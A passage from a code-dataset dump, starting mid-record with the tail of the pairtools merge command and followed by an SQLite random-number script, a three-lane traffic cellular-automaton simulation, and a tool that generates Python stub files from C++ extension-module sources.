{1},{1} -k {2},{2}n -k {3},{3}n -k {4},{4} \n --merge \n --field-separator=$'\\''{5}'\\''\n {6}\n {7}\n {8}\n -S {9}\n {10}\n \"\"\".replace(\n \"\\n\", \" \"\n ).format(\n pairsam_format.COL_C1 + 1,\n pairsam_format.COL_C2 + 1,\n pairsam_format.COL_P1 + 1,\n pairsam_format.COL_P2 + 1,\n pairsam_format.COL_PTYPE + 1,\n pairsam_format.PAIRSAM_SEP_ESCAPE,\n \" --parallel={} \".format(nproc) if nproc > 1 else \" \",\n \" --batch-size={} \".format(max_nmerge) if max_nmerge else \" \",\n \" --temporary-directory={} \".format(tmpdir) if tmpdir else \" \",\n memory,\n (\n \" --compress-program={} \".format(compress_program)\n if compress_program\n else \" \"\n ),\n )\n for path in paths:\n if kwargs.get(\"cmd_in\", None):\n command += r\"\"\" <(cat {} | {} | sed -n -e '\\''/^[^#]/,$p'\\'')\"\"\".format(\n path, kwargs[\"cmd_in\"]\n )\n elif path.endswith(\".gz\"):\n command += (\n r\"\"\" <(bgzip -dc -@ {} {} | sed -n -e '\\''/^[^#]/,$p'\\'')\"\"\".format(\n kwargs[\"nproc_in\"], path\n )\n )\n elif path.endswith(\".lz4\"):\n command += r\"\"\" <(lz4c -dc {} | sed -n -e '\\''/^[^#]/,$p'\\'')\"\"\".format(\n path\n )\n else:\n command += r\"\"\" <(sed -n -e '\\''/^[^#]/,$p'\\'' {})\"\"\".format(path)\n command += \"'\"\n\n subprocess.check_call(command, shell=True, stdout=outstream)\n\n if outstream != sys.stdout:\n outstream.close()\n\n\nif __name__ == \"__main__\":\n merge()\n", "sub_path": "pairtools/cli/merge.py", "file_name": "merge.py", "file_ext": "py", "file_size_in_byte": 7587, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": 
"32", "api": [{"api_name": "click.argument", "line_number": 15, "usage_type": "call"}, {"api_name": "click.option", "line_number": 20, "usage_type": "call"}, {"api_name": "click.option", "line_number": 29, "usage_type": "call"}, {"api_name": "click.option", "line_number": 37, "usage_type": "call"}, {"api_name": "click.option", "line_number": 43, "usage_type": "call"}, {"api_name": "click.option", "line_number": 50, "usage_type": "call"}, {"api_name": "click.option", "line_number": 60, "usage_type": "call"}, {"api_name": "click.option", "line_number": 67, "usage_type": "call"}, {"api_name": "click.option", "line_number": 74, "usage_type": "call"}, {"api_name": "click.option", "line_number": 81, "usage_type": "call"}, {"api_name": "click.option", "line_number": 91, "usage_type": "call"}, {"api_name": "click.option", "line_number": 101, "usage_type": "call"}, {"api_name": "click.option", "line_number": 107, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 149, "usage_type": "call"}, {"api_name": "lib.fileio.auto_open", "line_number": 154, "usage_type": "call"}, {"api_name": "lib.fileio", "line_number": 154, "usage_type": "name"}, {"api_name": "lib.fileio.auto_open", "line_number": 163, "usage_type": "call"}, {"api_name": "lib.fileio", "line_number": 163, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 171, "usage_type": "attribute"}, {"api_name": "lib.fileio.auto_open", "line_number": 178, "usage_type": "call"}, {"api_name": "lib.fileio", "line_number": 178, "usage_type": "name"}, {"api_name": "lib.headerops.get_header", "line_number": 184, "usage_type": "call"}, {"api_name": "lib.headerops", "line_number": 184, "usage_type": "name"}, {"api_name": "lib.headerops.all_same_columns", "line_number": 191, "usage_type": "call"}, {"api_name": "lib.headerops", "line_number": 191, "usage_type": "name"}, {"api_name": "lib.headerops.merge_headers", "line_number": 194, "usage_type": "call"}, {"api_name": "lib.headerops", "line_number": 194, "usage_type": "name"}, {"api_name": "lib.headerops.append_new_pg", "line_number": 195, "usage_type": "call"}, {"api_name": "lib.headerops", "line_number": 195, "usage_type": "name"}, {"api_name": "lib.pairsam_format.COL_C1", "line_number": 219, "usage_type": "attribute"}, {"api_name": "lib.pairsam_format", "line_number": 219, "usage_type": "name"}, {"api_name": "lib.pairsam_format.COL_C2", "line_number": 220, "usage_type": "attribute"}, {"api_name": "lib.pairsam_format", "line_number": 220, "usage_type": "name"}, {"api_name": "lib.pairsam_format.COL_P1", "line_number": 221, "usage_type": "attribute"}, {"api_name": "lib.pairsam_format", "line_number": 221, "usage_type": "name"}, {"api_name": "lib.pairsam_format.COL_P2", "line_number": 222, "usage_type": "attribute"}, {"api_name": "lib.pairsam_format", "line_number": 222, "usage_type": "name"}, {"api_name": "lib.pairsam_format.COL_PTYPE", "line_number": 223, "usage_type": "attribute"}, {"api_name": "lib.pairsam_format", "line_number": 223, "usage_type": "name"}, {"api_name": "lib.pairsam_format.PAIRSAM_SEP_ESCAPE", "line_number": 224, "usage_type": "attribute"}, {"api_name": "lib.pairsam_format", "line_number": 224, "usage_type": "name"}, {"api_name": "subprocess.check_call", "line_number": 254, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 256, "usage_type": "attribute"}]} +{"seq_id": "469460225", "text": "import sqlite3\r\nfrom random import randint\r\n\r\n# create database and connect to it\r\nwith sqlite3.connect(\"newnum.db\") as connection:\r\n\t\r\n\tc = 
connection.cursor()\r\n\t\r\n\tc.execute(\"DROP TABLE if exists aggregation\")\r\n\t\r\n\tc.execute(\"CREATE TABLE aggregation(num int)\")\r\n\t\r\n\t# insert numbers into the database\r\n\tfor i in range(100):\r\n\t\tc.execute(\"INSERT INTO aggregation VALUES(?)\",\r\n\t\t(randint(0,100),))\r\n\t\r\n# close connection with the database\r\nc.close()", "sub_path": "numbers1.py", "file_name": "numbers1.py", "file_ext": "py", "file_size_in_byte": 449, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sqlite3.connect", "line_number": 5, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "418762628", "text": "# Ver. 4\n\nimport random\nimport copy\nimport sys\nimport matplotlib.pyplot as plt\nimport collections\n\n\ndef rand_ints_nodup(a, b, k):\n    ns = []\n    while len(ns) < k:\n        n = random.randint(a, b)\n        if n not in ns:\n            ns.append(n)\n    return ns\n\ndef setcar_list(car, line, lines, cell):\n    index = rand_ints_nodup(0, (cell-1)*(line-2), car)\n    for i in range(car):\n        lines[index[i]%3+1][index[i]//3] = 1\n    return lines\n\ndef process(line, cell, lines, tmplist):\n    forward = 0\n    next_forward = 0\n    for c in range(cell, -1, -1):\n        for l in range(1, line-2+1):\n            if lines[l][c] == 1 and c <= cell-1 and (lines[l][c+1] == 0 or lines[l][c+1] == 2):\n                forward = 1\n                next_forward = 1\n                \n                # how much free space is there ahead of this car\n                while(not lines[l][c+forward]):\n                    forward += 1\n                \n                # work out the free space in the neighboring lanes\n                left_forward = 0\n                right_forward = 0\n                if l==1:\n                    if lines[l+1][c] == 0: # is the next lane clear alongside? a car there could mean a collision\n                        right_forward = 1\n                        while(right_forward <= cell - c and not lines[l+1][c+right_forward]):\n                            right_forward += 1\n                        next_forward = right_forward\n                elif l==2:\n                    if lines[l-1][c] == 0:\n                        left_forward = 1\n                        while(left_forward <= cell - c and not lines[l-1][c+left_forward]):\n                            left_forward += 1\n                        next_forward = left_forward\n                        right_forward = 0\n                elif l==3: # lane3 is forced over to lane2 whenever the front-left cell is free\n                    left_forward = 1\n                    while(left_forward <= cell - c and not lines[l - 1][c+left_forward]):\n                        left_forward += 1\n                    next_forward = left_forward\n                \n                # when the neighboring lane has more room\n                if next_forward > forward and l==1:\n                    tmplist[l+1][c+1] = 1\n                    tmplist[l][c] = 0\n                elif next_forward > forward and l==2:\n                    if left_forward:\n                        tmplist[l-1][c+1] = 1\n                        tmplist[l][c] = 0\n                    else:\n                        tmplist[l+1][c+1] = 1\n                        tmplist[l][c] = 0\n                elif next_forward > forward and l==3:\n                    tmplist[l-1][c+1] = 1 # move to the front-left cell\n                    tmplist[l][c] = 0\n                # when the road ahead has more room.\n                elif next_forward <= forward and lines[l][c+1] == 0:\n                    if l == 2 and lines[l+1][c] == 1: # in lane2, yield if a car is alongside on the right\n                        tmplist[l][c] = 1\n                    elif l==3 and lines[l-1][c] == 0 and lines[l-1][c+1] == 0: # lane3 moves left whenever there is room\n                        tmplist[l-1][c+1] = 1\n                        tmplist[l][c] = 0\n                    else:\n                        tmplist[l][c+1] = 1\n                        tmplist[l][c] = 0\n                elif c == cell-1:\n                    if lines[l][c] == 1 and lines[l][c+1] == 1:\n                        tmplist[l][c] = 0\n            else:\n                if lines[l][c] == 1:\n                    tmplist[l][c] = 1\n    return tmplist\n\n\ndef analysis(lines):\n    jam = 0\n    for i in range(1, 4):\n        for j in range(len(lines[0])-2):\n            if lines[i][j] == 1 and lines[i][j+1] == 1:\n                jam += 1\n    return jam\n\ndef main(version):\n    cell = 20\n    line = 2+3\n    lines = [[0]*cell, [0]*cell, [0]*cell, [0]*cell, [0]*cell]\n    lines[0] = [2]*(cell+1)\n    lines[1].append(1)\n    lines[2].append(1)\n    lines[3].append(1)\n    lines[4] = [2]*(cell+1)\n    car = 30\n    lines = setcar_list(car, line, lines, cell)\n    redc = 8 # cell num for lane reduction\n    for i in range(redc):\n        lines[3][-2 - i] = 2\n    if version == 1:\n        
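# versions 1 and 2 block two extra cells of lane 3 at different spots (cells set to 2 appear to be impassable, like the border rows)\n        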
lines[3][-cell+3] = 2\n lines[3][-cell+4] = 2\n elif version == 2:\n lines[3][-10] = 2\n lines[3][-11] = 2\n tmplist = copy.deepcopy(lines)\n for i in range(line):\n print(lines[i])\n print()\n \n jamlist = []\n trialnum = 7000\n for _ in range(trialnum):\n tmplist = process(line, cell, lines, tmplist)\n for i in range(1, 4):\n if tmplist[i][0] == 0:\n tmplist[i][0] = random.randint(0,1)\n #for i in range(line):\n # print(tmplist[i])\n #print()\n jamlist.append(analysis(tmplist))\n lines = copy.deepcopy(tmplist)\n \n tmpdic = dict(collections.Counter(jamlist))\n print(tmpdic)\n data = sorted(tmpdic.items(), key=lambda x:x[0])\n dataX = [data[i][0] for i in range(len(data))]\n dataY = [data[i][1] for i in range(len(data))]\n plt.xlabel(\"jam level\")\n plt.ylabel(\"frequency\")\n plt.grid()\n plt.plot(dataX,dataY)\n #fig = plt.figure()\n plt.savefig(\"img{}.png\".format(version))\n plt.show()\n \nif __name__ == \"__main__\":\n main(0)\n main(1)\n main(2)", "sub_path": "ce-automaton.py", "file_name": "ce-automaton.py", "file_ext": "py", "file_size_in_byte": 5350, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "random.randint", "line_number": 13, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 120, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 131, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 136, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}]} +{"seq_id": "626891061", "text": "#!/usr/bin/python\n\n# Copyright (c) 2021, Takuma.\n# Respect intellectual property, and do not delete these comments.\n# Thanks to Gurgarath for his help !\n\n# -*- coding: -*-\n\nimport glob\nimport os\nimport re\nfrom typing import *\nfrom typing import IO\n\n__author__ = \"Takuma\"\n__version__ = \"1.0\"\n__status__ = \"development\"\n\n# CONFIGURATION BLOCK\nOUTPUT_DIRECTORY: str = 'bin'\nINPUT_DIRECTORY: str = 'src'\n\n# DEVELOPMENT CONSTANTS\nFUNCTIONS_TYPE_CORRESPONDENCES: dict = {\n\t\"GetLong\": \"int\",\n\t\"GetDouble\": \"int\",\n\t\"GetFloat\": \"float\",\n\t\"GetByte\": \"int\",\n\t\"GetInteger\": \"int\",\n\t\"GetUnsignedLong\": \"int\",\n\t\"GetUnsignedInteger\": \"int\",\n\t\"GetString\": \"str\",\n\t\"GetWindow\": \"int\",\n\t\"GetBoolean\": \"bool\",\n\t\"GetTextInstance\": \"int\",\n\t\"GetThingInstance\": \"int\",\n\t\"GetImageInstance\": \"int\",\n\t\"GetExpandedImageInstance\": \"int\",\n\t\"GetObject\": \"object\"\n}\n\nLETTER_TYPE_CORRESPONDENCES: dict = 
{\n\t'i': \"int\",\n\t's': \"str\",\n\t'c': \"int\",\n\t'l': \"int\",\n\t'f': \"float\",\n\t'b': \"bool\"\n}\n\nCONSTANTS_FUNCTION: Dict[str, type] = {\n\t\"PyModule_AddIntConstant\": int,\n\t\"PyModule_AddStringConstant\": str\n\t# Add new type in Constant's render method\n}\n\nRESERVED_KEYWORD: list = [\n\t\"False\", \"def\", \"if\", \"raise\", \"None\", \"del\", \"import\", \"return\", \"True\", \"elif\", \"in\", \"try\", \"and\", \"else\", \"is\",\n\t\"while\", \"as\", \"except\", \"lambda\", \"with\", \"assert\", \"finally\", \"nonlocal\", \"yield\", \"break\", \"for\", \"not\", \"class\",\n\t\"from\", \"or\", \"continue\", \"global\", \"pass\"\n]\n\n\ndef get_python_type_by_function(arg_type: str) -> str:\n\t\"\"\"\n\tReturn python type for c++ arg_type with function as reference\n\t:param arg_type: argument's type in C++\n\t:return: Python's equivalent for arg_type\n\t\"\"\"\n\tif arg_type in FUNCTIONS_TYPE_CORRESPONDENCES:\n\t\treturn FUNCTIONS_TYPE_CORRESPONDENCES[arg_type]\n\traise Exception(\"Unknown C++ type: {}\".format(arg_type))\n\n\ndef get_python_type_by_letter(arg_type: str) -> str:\n\t\"\"\"\n\tReturn python type for c++ arg_type with letter as reference\n\t:param arg_type: argument's type in C++\n\t:return: Python's equivalent for arg_type\n\t\"\"\"\n\tif arg_type in LETTER_TYPE_CORRESPONDENCES:\n\t\treturn LETTER_TYPE_CORRESPONDENCES[arg_type]\n\traise Exception(\"Unknown C++ type: {}\".format(arg_type))\n\n\ndef comment_remover(text) -> str:\n\t\"\"\"\n\tRemove comments from C++ text\n\t:param text: str: C++ code\n\t:return: str: code uncomment.\n\t\"\"\"\n\n\tdef replacer(match):\n\t\ts: str = match.group(0)\n\t\tif s.startswith('/'):\n\t\t\treturn \" \"\n\t\telse:\n\t\t\treturn s\n\n\tpattern = re.compile(\n\t\tr'//.*?$|/\\*.*?\\*/|\\'(?:\\\\.|[^\\\\\\'])*\\'|\"(?:\\\\.|[^\\\\\"])*\"',\n\t\tre.DOTALL | re.MULTILINE\n\t)\n\treturn re.sub(pattern, replacer, text)\n\n\ndef write_head_block(file: IO, ) -> NoReturn:\n\t\"\"\"\n\tWrite in file the common file's header\n\t:param file: file\n\t\"\"\"\n\tfile.write(\"\"\"from typing import *\n\n\n__author__ = \"Takuma\"\n__version__ = \"1.0\"\n__status__ = \"development\"\n\n\n# Copyright (c) 2021, Takuma.\n# Respect intellectual property, and do not delete these comments.\n# Thanks to Gurgarath for his help for one regex !\n\"\"\")\n\n\ndef check_render_space() -> NoReturn:\n\t\"\"\"\n\tCheck if render file can be created by check if output directory is/can be created\n\t\"\"\"\n\tif not os.path.exists(OUTPUT_DIRECTORY):\n\t\ttry:\n\t\t\tos.makedirs(\"bin\")\n\t\texcept Exception:\n\t\t\traise Exception(\"Can't create output directory\")\n\n\nclass Argument:\n\t\"\"\"\n\tModel an argument, and allows to determine its equivalent in Python.\n\t\"\"\"\n\n\tdef __init__(self, name: str, arg_type: Union[str, None]) -> NoReturn:\n\t\t\"\"\"\n\t\tArgument class constructor.\n\t\t:param name: Argument's name\n\t\t:param arg_type: Argument's type\n\t\t\"\"\"\n\t\tself.name: str = name\n\t\tself.arg_type: Union[str, None] = arg_type\n\t\tself.check_name()\n\n\tdef check_name(self) -> NoReturn:\n\t\t\"\"\"\n\t\tCheck if name doesn't contains reserved word\n\t\t\tExample:\n\t\t\t\tIt changes from to _from\n\t\t\t\tIt changes cWindows->Var to cWindows_Var\n\t\t\"\"\"\n\t\tif self.name in RESERVED_KEYWORD:\n\t\t\tself.name = '_' + self.name\n\t\tself.name = self.name.replace(\".\", \"_\")\n\n\tdef render(self) -> Union[str, None]:\n\t\t\"\"\"\n\t\tGet Python's equivalent of current argument\n\t\t:return: str: \"name: 
type\"\n\t\t\"\"\"\n\t\tif self.name and self.arg_type:\n\t\t\treturn f\"{self.name}: {(get_python_type_by_function(self.arg_type))}\"\n\t\telif self.name:\n\t\t\treturn f\"{self.name}\"\n\n\tdef __str__(self) -> str:\n\t\t\"\"\"\n\t\tGet Argument's name\n\t\t:return: str: Argument's name\n\t\t\"\"\"\n\t\treturn self.name\n\n\nclass Method:\n\t\"\"\"\n\tModeling and processing of a function\n\t\"\"\"\n\n\tdef __init__(self) -> NoReturn:\n\t\t\"\"\"\n\t\tInitialization for Function class\n\t\t\"\"\"\n\t\tself.name: str = str()\n\t\tself.arguments: List[Argument] = list()\n\t\tself.returned_value: Union[None, str] = None\n\t\tself.content: str = str()\n\t\tself.f_return: List[Argument] = list()\n\n\tdef set_name(self, name: str) -> NoReturn:\n\t\t\"\"\"\n\t\tSet function's name\n\t\t:param name: str: Function's name\n\t\t\"\"\"\n\t\tself.name = name\n\n\tdef add_argument(self, argument: Argument) -> NoReturn:\n\t\t\"\"\"\n\t\tAdd one function's argument\n\t\t:param argument: Argument: arg\n\t\t\"\"\"\n\t\tself.arguments.append(argument)\n\n\tdef get_name(self) -> str:\n\t\t\"\"\"\n\t\tGet function's name\n\t\t:return: str: function's name\n\t\t\"\"\"\n\t\treturn self.name\n\n\tdef set_content(self, content: str) -> NoReturn:\n\t\t\"\"\"\n\t\tSet function's content\n\t\t:param content: str: function's content\n\t\t\"\"\"\n\t\tself.content = content\n\n\tdef set_returned_value(self, value: str) -> NoReturn:\n\t\t\"\"\"\n\t\tSet function's returned values\n\t\t:param value: str: value\n\t\t\"\"\"\n\t\tself.returned_value = value\n\n\tdef get_argument(self, index: int = -1) -> Union[List[Argument], Argument]:\n\t\t\"\"\"\n\t\tGet argument(s)\n\t\t:param index: index of element\n\t\t:return: Union[List[Argument], Argument]: argument(s)\n\t\t\"\"\"\n\t\tif 0 <= index < len(self.arguments):\n\t\t\treturn self.arguments[index]\n\t\treturn self.arguments\n\n\tdef process(self) -> NoReturn:\n\t\t\"\"\"\n\t\tRead content and parse arguments + return\n\t\t\"\"\"\n\t\targs_matches = re.findall(\"PyTuple_(.*)\\(.*,\\s*(.*)\\s*,\\s*&(.*)\\)\\)\", self.content)\n\t\targs_matches = sorted(args_matches, key=lambda tup: tup[1])\n\t\tused_id: List[int] = list()\n\t\tunknown_format: bool = False\n\t\tfor match in args_matches:\n\t\t\tif match[2] not in used_id:\n\t\t\t\tused_id.append(match[2])\n\t\t\telse:\n\t\t\t\tunknown_format = True\n\t\tif unknown_format:\n\t\t\targ_count: int = int(max(args_matches, key=lambda index: index[1])[1])\n\t\t\tfor i in range(0, arg_count + 1):\n\t\t\t\targument: Argument = Argument(f\"unknown_{i}=None\", None)\n\t\t\t\tself.add_argument(argument)\n\t\t\treturn\n\n\t\tfor match in args_matches:\n\t\t\targ: Argument = Argument(match[2], match[0])\n\t\t\tself.add_argument(arg)\n\n\t\treturn_match: List = re.findall(\"return\\s*Py_BuildValue\\(\\\"(.*)\\\"\", self.content)\n\t\tif return_match:\n\t\t\tif len(return_match) == 1:\n\t\t\t\treturn_format: str = return_match[0].replace('#', '').replace('*', '') # Remove unknown char Python\n\t\t\t\tif len(return_format) == 1:\n\t\t\t\t\tself.set_returned_value(get_python_type_by_letter(return_format.lower()))\n\t\t\t\telse:\n\t\t\t\t\toutput_str: str = \"Tuple[\"\n\t\t\t\t\tfor letter in return_format:\n\t\t\t\t\t\tif letter == '(':\n\t\t\t\t\t\t\toutput_str += \"Tuple[\"\n\t\t\t\t\t\telif letter == ')':\n\t\t\t\t\t\t\toutput_str += \"], \"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\toutput_str += get_python_type_by_letter(letter.lower())\n\t\t\t\t\t\t\toutput_str += \", \"\n\t\t\t\t\toutput_str = output_str[:-2] + 
\"]\"\n\t\t\t\t\tself.set_returned_value(output_str)\n\n\tdef render(self) -> str:\n\t\t\"\"\"\n\t\tRender a function\n\t\t:return: str: function's render\n\t\t\"\"\"\n\t\tif self.name != str():\n\t\t\trender: str = f\"def {self.name}(\" # def xxx(self,_\n\n\t\t\t# Arguments\n\t\t\tif self.arguments:\n\t\t\t\tfor arg in self.arguments:\n\t\t\t\t\trender += arg.render() + \", \"\n\t\t\t\trender = render[:-2] + \")\"\n\t\t\telse:\n\t\t\t\trender += \")\"\n\n\t\t\t# Return\n\t\t\trender += \" -> \"\n\t\t\tif self.returned_value:\n\t\t\t\trender += self.returned_value\n\t\t\telse:\n\t\t\t\trender += \"NoReturn\"\n\t\t\trender += \":\"\n\n\t\t\t# Body\n\t\t\trender += \"\\n\\tpass\\n\"\n\n\t\t\treturn render\n\t\treturn \"\"\n\n\tdef __str__(self) -> str:\n\t\t\"\"\"\n\t\tString for represent a functions\n\t\t:return: str: representation\n\t\t\"\"\"\n\t\treturn \"{}({})\".format(\n\t\t\tself.name,\n\t\t\t\", \".join(str(arg) for arg in self.arguments)\n\t\t)\n\n\nclass Constant:\n\t\"\"\"\n\tClass to modeling a constant\n\t\"\"\"\n\n\tdef __init__(self, name: str, value: type) -> NoReturn:\n\t\t\"\"\"\n\t\tInitialization of Constant\n\t\t:param name: str: Constant's name\n\t\t:param value: Union[str, int]: Constant's value\n\t\t\"\"\"\n\t\tself.name: str = name\n\t\tself.value: type = value\n\n\tdef render(self) -> str:\n\t\t\"\"\"\n\t\tReturn a string who represents the constant in Python\n\t\t:return: str: representation\n\t\t\"\"\"\n\t\ttype_output: Union[str, int] = \"\"\n\t\tif self.value is int:\n\t\t\ttype_output = 1\n\t\telif self.value is str:\n\t\t\ttype_output = \"''\"\n\t\treturn f\"{self.name} = {type_output}\"\n\n\tdef __str__(self) -> str:\n\t\t\"\"\"\n\t\tRepresentation in Python\n\t\t:return: str: representation\n\t\t\"\"\"\n\t\treturn f\"{self.name} = {self.value}\"\n\n\nclass SrcFile:\n\t\"\"\"\n\tModeling of one source file\n\t\"\"\"\n\n\tdef __init__(self, path: str) -> NoReturn:\n\t\t\"\"\"\n\t\tInitialization for SrcFile class\n\t\t\"\"\"\n\t\tself.path: str = path\n\t\tself.lines: List[str] = list()\n\t\tself.module_name: str = str()\n\t\tself.methods_dic_name: str = str()\n\t\tself.constants: List[Constant] = list()\n\t\tself.constants_name: List[str] = list()\n\t\tself.methods: Dict[str, str] = dict() # s_methods\\[\\]((.|\\n)*){((.|_n)*)} --> {.*\\\"(.*)\\\",(.*),.*} --> strip\n\t\tself.methods_list_contents: Dict[str, str] = dict() # PyObject\\s*\\*\\s*(.*)\\(.*\\)(.|\\n*){(.|\\n)*?}\n\t\tself.methods_object: List[Method] = list()\n\n\tdef read_lines(self) -> NoReturn:\n\t\t\"\"\"\n\t\tRead files in utf-8 and save them\n\t\t\"\"\"\n\t\twith open(self.path, \"r+\", encoding=\"utf-8\", errors=\"ignore\") as file:\n\t\t\tself.lines = file.readlines()\n\n\tdef read_module_name(self) -> NoReturn:\n\t\t\"\"\"\n\t\tSearch line with module and get his name\n\t\t\"\"\"\n\t\tfor line in self.lines:\n\t\t\tif \"Py_InitModule(\" in line:\n\t\t\t\tgroups = re.search(\"Py_InitModule\\(\\\\\\\"(.*?)\\\\\\\",\\s*(.*)\\)\", line)\n\t\t\t\tif groups:\n\t\t\t\t\tgroups = groups.groups()\n\t\t\t\tself.module_name = groups[0]\n\t\t\t\tself.methods_dic_name = groups[1]\n\n\tdef read_module_content(self) -> NoReturn:\n\t\t\"\"\"\n\t\tRead module content to find method and her content\n\t\t\"\"\"\n\t\tcontent: str = \"\".join(self.lines)\n\t\tcontent = comment_remover(content)\n\t\tmethods: Match = re.search(self.methods_dic_name + '\\[]((.|\\n)*){((.|_n)*)}', content)\n\n\t\tif not methods:\n\t\t\treturn\n\n\t\tmethods_group: str = methods.groups()[0]\n\t\tmethods_list: list = 
re.findall('{.*\\\"(.*)\\\",\\t*(.*),.*}', methods_group)\n\t\tif methods_list:\n\t\t\tfor m in methods_list:\n\t\t\t\tif len(m) == 2:\n\t\t\t\t\tself.methods[m[1].strip()] = m[0].strip()\n\t\toccurrences: List = re.findall(\"PyObject\\s*\\*\\s*(.*)\\(.*\\)\\s*{((?:[^{}]+|{([^{}]+)}){3})}\", content)\n\t\tfor occurrence in occurrences:\n\t\t\tself.methods_list_contents[occurrence[0]] = occurrence[1]\n\n\t\tto_delete: list = list()\n\t\tfor method in self.methods_list_contents:\n\t\t\tif method not in self.methods.keys():\n\t\t\t\tto_delete.append(method)\n\t\tfor method in to_delete:\n\t\t\tself.methods_list_contents.pop(method)\n\n\tdef read_functions(self) -> NoReturn:\n\t\t\"\"\"\n\t\tRead all functions name, create object and work on it\n\t\t:return:\n\t\t\"\"\"\n\t\tfor method in self.methods_list_contents:\n\t\t\tfunction = Method()\n\t\t\tfunction.set_name(self.methods[method])\n\t\t\tfunction.set_content(self.methods_list_contents[method])\n\t\t\tfunction.process()\n\t\t\tself.methods_object.append(function)\n\n\tdef read_constant(self) -> NoReturn:\n\t\t\"\"\"\n\t\tRead file's content to find constant and add them to the class\n\t\t\"\"\"\n\t\tcontent: str = \"\".join(self.lines)\n\t\tfor constant_declaration in CONSTANTS_FUNCTION.keys():\n\t\t\tconstants: List = re.findall(\"{}\\(.*\\\"(.*)\\\",\\s*.*\\)\".format(\n\t\t\t\tconstant_declaration\n\t\t\t), content)\n\t\t\tfor constant in constants:\n\t\t\t\tif constant not in self.constants_name:\n\t\t\t\t\tself.constants_name.append(constant)\n\t\t\t\t\tself.constants.append(Constant(\n\t\t\t\t\t\tconstant,\n\t\t\t\t\t\tCONSTANTS_FUNCTION[constant_declaration]\n\t\t\t\t\t))\n\n\tdef process(self) -> NoReturn:\n\t\t\"\"\"\n\t\tWork on the file\n\t\t\"\"\"\n\t\tself.read_lines()\n\t\tself.read_module_name()\n\t\tself.read_module_content()\n\t\tself.read_functions()\n\t\tself.read_constant()\n\n\tdef render(self) -> NoReturn:\n\t\t\"\"\"\n\t\tRender a module\n\t\t\"\"\"\n\t\tif self.module_name == \"\" or not self.methods_object:\n\t\t\treturn\n\t\tcheck_render_space()\n\t\twith open(f\"{OUTPUT_DIRECTORY}/{self.module_name}.py\", \"w\", encoding=\"utf-8\") as rendering_file:\n\t\t\tprint(f\"Rendering {self.module_name}...\")\n\t\t\twrite_head_block(rendering_file)\n\t\t\tfor constant in self.constants:\n\t\t\t\trendering_file.write(\"\\n\")\n\t\t\t\trendering_file.write(constant.render())\n\t\t\tfor method in self.methods_object:\n\t\t\t\trendering_file.write(\"\\n\\n\")\n\t\t\t\trendering_file.write(method.render())\n\n\tdef has_module(self) -> bool:\n\t\t\"\"\"\n\t\tIf file has module\n\t\t:return: bool: has module\n\t\t\"\"\"\n\t\treturn self.module_name != str()\n\n\tdef __str__(self) -> str:\n\t\t\"\"\"\n\t\tMake string who represent SrcFile current object\n\t\t:return: str: representation\n\t\t\"\"\"\n\t\treturn self.path\n\n\nclass SrcFiles:\n\t\"\"\"\n\tClass for processing on multiple SrcFile\n\t\"\"\"\n\n\tdef __init__(self, path: str) -> NoReturn:\n\t\t\"\"\"\n\t\tInitialization of class\n\t\t:param path: str: path of files\n\t\t\"\"\"\n\t\tself.files: List[SrcFile] = list()\n\t\tself.path: str = path\n\n\tdef add_file(self, file: str) -> NoReturn:\n\t\t\"\"\"\n\t\tAdd SrcFile's path\n\t\t:param file: str: path\n\t\t\"\"\"\n\t\tcurrent_file: SrcFile = SrcFile(file)\n\t\tself.files.append(current_file)\n\n\tdef remove_file(self, file: SrcFile) -> NoReturn:\n\t\t\"\"\"\n\t\tRemove path from list\n\t\t:param file: src: file's path to delete\n\t\t\"\"\"\n\t\tself.files.remove(file)\n\n\tdef process(self) -> 
NoReturn:\n\t\t\"\"\"\n\t\tProcessing on each SrcFile\n\t\t\"\"\"\n\t\tinput_files = glob.glob(f\"{self.path}/*\", recursive=True)\n\t\tfor file in input_files:\n\t\t\tif os.path.exists(file):\n\t\t\t\tself.add_file(file)\n\n\t\tfor file in self.files:\n\t\t\tfile.process()\n\n\t\tfor file in self.files:\n\t\t\tif not file.has_module():\n\t\t\t\tself.remove_file(file)\n\n\t\tfor file in self.files:\n\t\t\tfile.render()\n\n\tdef __str__(self) -> str:\n\t\t\"\"\"\n\t\tMaking string to represent class\n\t\t:return: str: representation\n\t\t\"\"\"\n\t\treturn f\"[{', '.join(str(x) for x in self.files)}]\"\n\n\ndef process() -> NoReturn:\n\t\"\"\"\n\tInitialize SrcFiles objet, and start process.\n\t\"\"\"\n\tprint(\"Getting all files in src directory\")\n\n\tfiles = SrcFiles(INPUT_DIRECTORY)\n\tfiles.process()\n\n\nif __name__ == '__main__':\n\tprint(\"Welcome !\")\n\tprint(\"I was coded by Takuma! A Frenchman who loves baguettes!\")\n\tprint(\"This tools only support one module per files...\")\n\tprint(\"And module initialisation have to be on only one line.\")\n\tprint(\"As it's by default.\")\n\tprocess()\n\tprint(\"Ended.\")\n", 